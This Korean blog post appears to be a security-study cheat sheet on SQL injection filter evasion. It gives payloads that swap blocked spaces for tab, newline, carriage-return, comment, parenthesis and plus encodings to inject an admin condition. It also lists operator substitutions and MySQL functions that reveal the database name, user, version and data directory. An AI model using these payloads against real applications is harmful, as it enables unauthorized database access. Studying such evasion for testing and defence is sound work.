EASY7
SQL injection 본문
#SQL Injection 공격시 공백 문자 필터링시 우회 방법
아스키코드 단어에서 hex코드로 고쳐보기
Tab : %09
예시) no=1%09or%09id='admin'
Line Feed (\n): %0a
예시) no=1%0aor%0aid='admin'
3. Carrage Return(\r)새 줄 시작 : %0d
예시) no=1%0dor%0did='admin'
주석 : /**/
- no=1/**/or/**/id='admin'
괄호 : ()
- no=(1)or(id='admin')
더하기 : +
- no=1+or+id='admin'
데이터베이스의 함수
database() : db명을 알려주는 함수
user() : 현재 사용자의 아이디
system_user() : 최고 권한 사용자의 아이디
@@verson : DB 서버의 버전
@@datadir : DB 서버가 존재하는 디렉터리
우회기법
| = | like, between, in |
| or | || |
| and | %26%26, && |
유용한 함수
substr(문자, 시작번호, 갯수)
left(문자, 갯수)
mid(문자, 시작번호, 갯수)
sql에서는 문자열과 문자열을 이을 때 '.'으로 한다.
'보안 공부 > 취약점 실습' 카테고리의 다른 글
| Metasploit 무차별 대입 공격 (0) | 2019.08.05 |
|---|---|
| Metasploit Scanning (0) | 2019.08.05 |
| SQL Map (0) | 2019.08.04 |
| Bash Shell Shock 취약점 (0) | 2019.08.03 |
| Exploit Database 사용법 (0) | 2019.08.03 |
'보안 공부/취약점 실습' Related Articles
more
Comments